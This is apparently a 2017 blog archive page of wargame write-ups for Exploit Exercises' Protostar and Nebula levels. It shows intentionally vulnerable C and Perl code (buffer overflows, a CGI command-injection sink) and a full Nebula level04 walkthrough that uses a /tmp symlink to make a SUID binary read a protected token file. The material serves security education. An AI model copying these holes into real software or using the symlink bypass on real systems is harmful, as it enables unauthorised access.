Thursday, March 9, 2017

Protostar - stack3

This is my fourth post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

Stack3 looks at environment variables, and how they can be set, and overwriting function pointers stored on the stack (as a prelude to overwriting the saved EIP)
Hints
  • both gdb and objdump is your friend you determining where the win() function lies in memory.
This level is at /opt/protostar/bin/stack3

Source code



#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}


Tuesday, March 7, 2017

Nebula - level07

This is my eighth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.
To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.

Source code

#!/usr/bin/perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub ping {
  $host = $_[0];

  print("<html><head><title>Ping results</title></head><body><pre>");

  @output = `ping -c 3 $host 2>&1`;
  foreach $line (@output) { print "$line"; }

  print("</pre></body></html>");
  
}

# check if Host set. if not, display normal page, etc

ping(param("Host"));

Protostar - stack2

This is my third post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

Stack2 looks at environment variables, and how they can be set.
This level is at /opt/protostar/bin/stack2

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

Saturday, March 4, 2017

Nebula - level06

This is my seventh post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

The flag06 account credentials came from a legacy unix system.
To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.

Source code

There is no source code available for this level


Nebula - level05

This is my sixth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

Check the flag05 home directory. You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.

Source code

There is no source code available for this level


Wednesday, March 1, 2017

Protostar - stack1

This is my second post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:



Nebula - level04

This is my fifth post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)

To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.


Source code

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>

int main(int argc, char **argv, char **envp)
{
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
      printf("%s [file to read]\n", argv[0]);
      exit(EXIT_FAILURE);
  }

  if(strstr(argv[1], "token") != NULL) {
      printf("You may not access '%s'\n", argv[1]);
      exit(EXIT_FAILURE);
  }

  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
      err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));
  
  if(rc == -1) {
      err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
}

We read our code above. There are arguments that state if we give the appropriate argument, we will read the file. If it's token but we don't ave access, we fail. If it's a file we cannot read, we fail. If we break the buffer, we fail.

So, it looks like we need proper privileges to read the token file.

With our information in hand, we SSH into the host:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
level04@nebula:/home/flag04$ ls -lah
total 13K
drwxr-x--- 2 flag04 level04   93 2011-11-20 21:52 .
drwxr-xr-x 1 root   root      60 2012-08-27 07:18 ..
-rw-r--r-- 1 flag04 flag04   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag04 flag04  3.3K 2011-05-18 02:54 .bashrc
-rwsr-x--- 1 flag04 level04 7.3K 2011-11-20 21:52 flag04
-rw-r--r-- 1 flag04 flag04   675 2011-05-18 02:54 .profile
-rw------- 1 flag04 flag04    37 2011-11-20 21:52 token
level04@nebula:/home/flag04$ 

Per usual, we see the flag04 file is has SUID and is owned by flag04 and allows level04 (us) to run it.

We run the file to get a feel with what we're working with:

level04@nebula:/home/flag04$ ./flag04 
./flag04 [file to read]
level04@nebula:/home/flag04$

As expected, we need a file to read.

After tinkering around and realizing that the code allows us to execute, we just need to create a symbolic link on a file that "we" own and have the program call that file.

Let's do this:

level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04
level04@nebula:/home/flag04$ ls -lah /tmp/level04
lrwxrwxrwx 1 level04 level04 18 2017-03-01 17:37 /tmp/level04 -> /home/flag04/token
level04@nebula:/home/flag04$ 

We create a symbolic link to /tmp/level04 to /home/flag04/token. We verify with ls -lah.

We then test our theory and execute:


level04@nebula:/home/flag04$ ./flag04 /tmp/level04
06508b5e-8909-4f38-b630-fdb148a848a2
level04@nebula:/home/flag04$ 

Excellent! We receive our token from /home/flag04/token.

Thanks for reading!

-geoda